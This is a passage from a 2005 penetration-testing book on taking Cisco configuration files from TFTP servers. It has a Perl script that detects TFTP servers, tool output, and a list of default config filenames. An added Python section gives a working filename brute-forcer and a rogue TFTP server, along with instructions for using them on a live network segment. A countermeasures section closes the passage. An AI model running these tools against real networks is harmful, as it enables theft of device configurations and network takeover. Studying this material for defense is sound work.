EXPLOITING TFTP SERVERS TO TAKE OVER CISCO HOSTS

Nearly every device in the Cisco product range has some form of TFTP support, either running a server itself or using a client to talk to a remote one. TFTP is a simple but useful "old-timer" protocol developed at the dawn of the Internet. Its whole purpose is transferring files from one device to another, and that is where it gets its name: Trivial FTP.

On a large network with lots of Cisco devices, you will frequently find at least one central TFTP server. Upon bootup, some Cisco devices connect to it and load designated OS images or fetch their config files. TFTP is great for central management of a large device pool, but what about its security?

From the security viewpoint, the main interest is the possibility of obtaining a config file from the TFTP server. As you most probably know, TFTP has no authentication mechanism, and the only security measure available is a perfect example of "security through obscurity": an attacker must know the name of the file that resides on the server. Although guessing might sound easy, the catch is that TFTP has no directory listing operation, so you cannot ask the server which files it holds.

Enumerating TFTP Servers

Attack
Popularity: 3
Simplicity: 9
Impact: 2
Risk Rating: 5

There are known difficulties with enumerating UDP-based services. One of the best tools developed specifically to solve the banner-grabbing problem is Amap by Van Hauser. However, it has no trigger that correctly identifies a running TFTP service and reports the port as unidentified. The following example shows Amap output against a Cisco 2611 running IOS 12.3(6):

 arhontus / # amap 192.168.66.202 -u 69
 amap v4.7 (www.thc.org) started at 2005-03-01 00:19:24 - APPLICATION MAP mode
 Unidentified ports: 192.168.66.202:69/udp (total 1).
 amap v4.7 finished at 2005-03-01 00:19:30

Older Cisco TFTP server implementations reply to any garbage sent to the port with opcode 05 (error) and error code 0 ("not defined, see error message"). The actual error message differs: IOS 10/11 returns "Illegal operation," while the Cisco TFTP server for Windows replies with "Illegal TFTP operation".

Newer implementations, such as 12.x IOS, simply ignore improperly constructed TFTP requests, which makes them a more challenging target.

You can obviously try connecting with a standard TFTP client, but to accommodate lazy human nature we have automated this and added it to our favorite Cisco Torch. It sends a properly constructed TFTP read request (RRQ) for a random filename to the UDP port and waits for a reply with opcode 05 and error code 1 (file not found) to identify a running TFTP service:

 ###############################################################
 #   Cisco Torch Mass Scanner                                  #
 #   Because we need it...                                     #
 #   http://www.arhont.com/index-5.html                        #
 ###############################################################
 List of targets contains 1 host(s)
 16726:  Checking 192.168.20.30 ...
 *** Found  TFTP server
 --->
 - All scans done. Cisco Torch Mass Scanner  -
 ---> Exiting.

Alternatively, you can use the following piece of Perl code, taken from Cisco Torch, to do the same job in your own script:

 #!/usr/bin/perl
 # Identify a TFTP server: send a read request (RRQ) for a random filename
 # and treat any reply whose opcode is 05 (ERROR) as proof that TFTP answers.
 use strict;
 use warnings;
 use IO::Socket::INET;
 use Socket qw(pack_sockaddr_in inet_aton);

 sub timed_out { die "timeout\n"; }   # alarm handler: abort a blocking recv

 sub tftp_installed {
     my ($target) = @_;
     my $port    = 69;              # TFTP port
     my $retries = 2;               # Retries
     my $timeout = 2;               # UDP receive timeout, 2 sec
     my $file    = "Rand0mSTRING";  # filename that should not exist
     my $MAXLEN  = 2;               # Receive max length: the opcode only
     my $op      = 1;               # TFTP opcode 1 = RRQ
     my $mode    = "netascii";      # TFTP transfer mode
     # Build the TFTP "RRQ" packet: opcode, filename, NUL, mode, NUL
     my $pkt = pack("n a* c a* c", $op, $file, 0, $mode, 0);

     while ($retries != 0) {
         my $sock = IO::Socket::INET->new(Proto => 'udp')   # Open UDP socket
             or die "socket: $!";
         my $rpkt;
         # Send TFTP "RRQ" read request
         send($sock, $pkt, 0, pack_sockaddr_in($port, inet_aton($target)))
             or die "send: $!";
         eval {
             local $SIG{ALRM} = \&timed_out;  # Handle timeout
             alarm $timeout;
             $sock->recv($rpkt, $MAXLEN);     # Receive
             alarm 0;
         };
         alarm 0;                              # no alarm may outlive the eval
         close $sock;
         $retries--;
         # First 2 bytes are the opcode; 5 = ERROR, so a TFTP server answered
         if (defined $rpkt && length($rpkt) >= 2 && unpack("n", $rpkt) == 5) {
             print "*** Found  TFTP server\n";   # Cisco Torch calls log_print() here
             return 1;
         }
     }
     return 0;
 }

 tftp_installed($ARGV[0]) if @ARGV;   # usage: perl tftp_check.pl <target>

Sniffing Out Cisco Configuration Files

Attack
Popularity: 10
Simplicity: 9
Impact: 10
Risk Rating: 10

Which possibilities are available? First, you can sniff out the config name if you are on the same network segment (ARP spoofing, switch CAM table flooding, wireless). Expanding the previous example of Cisco devices grabbing files from a TFTP server, you can even get the config "by accident" via broadcast traffic. An "idiot-proof" mechanism is built into IOS: if the administrator has not specified the address of the TFTP server explicitly, a router obtains its IP address via BOOTP/DHCP and sends the request for its config file to the network broadcast address on UDP port 69, awaiting a response from any server willing to fulfill it. You can simply wait with tcpdump running until such an event occurs, or trigger one by launching a DoS attack that forces the router to reload. The name of the file is shown in the resulting request:

 arhontus / # tcpdump -n -i eth0 port 69
 23:39:34.142149 IP 192.168.30.25.34098 > 192.168.30.255.69: 25 RRQ "2611b-config" netascii

Provided that a sloppy administrator also forgot to specify the name of the config file, the router sends requests to the network broadcast address for the default config names, one after another. What stops you from pretending to be the legitimate TFTP server and answering the request before the real one does?

Bruteforcing TFTP Servers to Snatch Configs

Attack
Popularity: 8
Simplicity: 10
Impact: 10
Risk Rating: 9

If waiting is not an option, and you don't care about staying stealthy or about leaving huge log files behind, you can resort to an active attack: bruteforcing the TFTP server for correct filenames. You know what type of files you are after, and you also know the default names Cisco devices use for them. Dictionary attack functionality against TFTP servers is also included in Cisco Torch. The default names for Cisco config files are already stored in brutefile.txt, but you can generate more and add them if you want.

Run Cisco Torch and wait for it to go through the dictionary file. When the filename is found, the config will be automatically fetched and placed into the directory from which the tool was launched:

 arhontus / # perl cisco-torch.pl -g -j -b 192.168.30.20
 <snip>
 ###############################################################
 #   Cisco Torch Mass Scanner                                  #
 #   Because we need it...                                     #
 #   http://www.arhont.com/index-5.html                        #
 ###############################################################
 List of targets contains 1 host(s)
 17470:  Checking 192.168.30.20 ...
 *** Found  TFTP server
 *** Found  TFTP server remote filename : cisco-config
 *** Fetch  TFTP remote file : cisco-config
 ***Local file :192.168.30.20.cisco-config  download complete
 --->
 - All scans done. Cisco Torch Mass Scanner  -
 ---> Exiting

If you want to go through a large list of default names, check out another tool written during the process of compiling this chapter, tftp-brute.pl ( http://www.arhont.com/index-5.html at the moment), which runs a large number of parallel processes and does the job faster.

The most common Cisco router default config names are as follows:

 cisconet.cfg
 router.cfg
 ciscortr.cfg
 ifIndex-table
 router-config
 startup-config
 private-config
 persistent-data
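The two attacks above, the rogue server answering a router's broadcast read request and the filename dictionary attack, both come down to building and parsing a handful of RFC 1350 packets. The following Python is an added example written for this page; it is not Cisco Torch or tftp-brute.pl code. It builds RRQ/ACK/DATA/ERROR packets, classifies a server's reply to an RRQ (first DATA block means the name was right; ERROR code 1 means the server is there but the name is wrong; silence matches the newer IOS behaviour described earlier), runs a candidate list against a real server with brute_filenames(), and answers RRQs from an in-memory file table with RogueTftpServer. The filenames cisco-config and router.cfg come from the page; the file contents, the function and class names, and the peer address are constructed for the example.

```python
"""TFTP (RFC 1350) helpers for the two attacks described above: a filename
dictionary attack against a server, and a rogue server that answers a router's
broadcast read request.  Added example; not Cisco Torch or tftp-brute.pl code."""
import socket
import struct

RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
ENOTFOUND = 1    # TFTP error code 1: "File not found"
BLOCK = 512      # a DATA block shorter than 512 bytes ends the transfer

def build_rrq(filename, mode="netascii"):
    return struct.pack("!H", RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"

def build_ack(block):
    return struct.pack("!HH", ACK, block)

def build_data(block, payload):
    return struct.pack("!HH", DATA, block) + payload

def build_error(code, msg):
    return struct.pack("!HH", ERROR, code) + msg.encode() + b"\0"

def parse_request(pkt):
    """Return (opcode, filename, mode) for an RRQ/WRQ datagram, else None."""
    if len(pkt) < 4 or struct.unpack("!H", pkt[:2])[0] not in (RRQ, WRQ):
        return None
    fields = pkt[2:].split(b"\0")
    if len(fields) < 3:            # filename, mode, and the empty tail after the last NUL
        return None
    return (struct.unpack("!H", pkt[:2])[0], fields[0].decode(errors="replace"),
            fields[1].decode(errors="replace").lower())

def classify_reply(pkt):
    """What the reply to our RRQ tells us: 'data' = file exists (block 1 arrived),
    'not-found' = server up but wrong name, 'error' = server up, other refusal,
    'none' = silence or garbage (newer IOS ignores malformed requests)."""
    if len(pkt) < 4:
        return "none"
    op, arg = struct.unpack("!HH", pkt[:4])
    if op == DATA and arg == 1:
        return "data"
    if op == ERROR:
        return "not-found" if arg == ENOTFOUND else "error"
    return "none"

def brute_filenames(target, names, port=69, timeout=2.0):
    """Send one RRQ per candidate name; return the names the server answered with DATA."""
    found = []
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    for name in names:
        sock.sendto(build_rrq(name), (target, port))
        try:
            reply, _peer = sock.recvfrom(BLOCK + 4)
        except socket.timeout:
            continue
        if classify_reply(reply) == "data":   # a fetch would ACK block 1 and keep reading
            found.append(name)
    sock.close()
    return found

class RogueTftpServer:
    """Serves files from an in-memory table the way a rogue server answering a
    router's broadcast RRQ would.  reply() touches no socket, so it runs offline."""

    def __init__(self, files):
        self.files = files        # {filename: bytes}, constructed for the example
        self.sessions = {}        # peer address -> filename being sent

    def reply(self, pkt, peer=("127.0.0.1", 0)):
        req = parse_request(pkt)
        if req is not None:
            op, name, _mode = req
            if op != RRQ or name not in self.files:
                return build_error(ENOTFOUND, "File not found")
            self.sessions[peer] = name
            return build_data(1, self.files[name][:BLOCK])
        if len(pkt) == 4 and pkt[:2] == struct.pack("!H", ACK) and peer in self.sessions:
            acked = struct.unpack("!H", pkt[2:4])[0]
            data = self.files[self.sessions[peer]]
            if len(data[(acked - 1) * BLOCK:acked * BLOCK]) < BLOCK:
                del self.sessions[peer]                     # last block was short: done
                return b""
            return build_data(acked + 1, data[acked * BLOCK:(acked + 1) * BLOCK])
        return build_error(4, "Illegal TFTP operation")

    def serve(self, bind=("0.0.0.0", 69)):
        # Blocking loop; 0.0.0.0 also receives RRQs sent to the broadcast address.
        # A full server would answer from a fresh source port (TID) per transfer.
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.bind(bind)
        while True:
            pkt, peer = sock.recvfrom(BLOCK + 4)
            out = self.reply(pkt, peer)
            if out:
                sock.sendto(out, peer)
```

To run the dictionary attack against a real host, feed brute_filenames() the default names listed above; to play the rogue server for the broadcast case, run RogueTftpServer({"2611b-config": open("fake.cfg", "rb").read()}).serve() as root on the segment and wait for the router to reload. Note that recvfrom returns the server's reply from whatever source port it chose, so the classification works with servers that move to a new TID as well as those that answer from port 69.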

Countermeasures Against TFTP-Related Attacks

Countermeasure 

The best way to avoid TFTP-related attacks is not to use TFTP at all. It can be replaced with FTP, which at least authenticates the client (though it still sends credentials and files in the clear), and, in fortunate cases, with Secure FTP (SFTP) or SCP. If you do need TFTP because there are older appliances on your network, choose unguessable names for the configuration files stored on the TFTP server and restrict access to the server to those legitimate appliances only, using the firewalling capabilities of the host on which the TFTP server runs. In some cases, as with the SolarWinds TFTPd, basic access control is built into the server and should be used. Also, it is very unlikely that you need TFTP running all the time; once the configuration or operating system image upload or download is finished, turn the TFTP server off.


Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions
ISBN: 0072259175
Year: 2005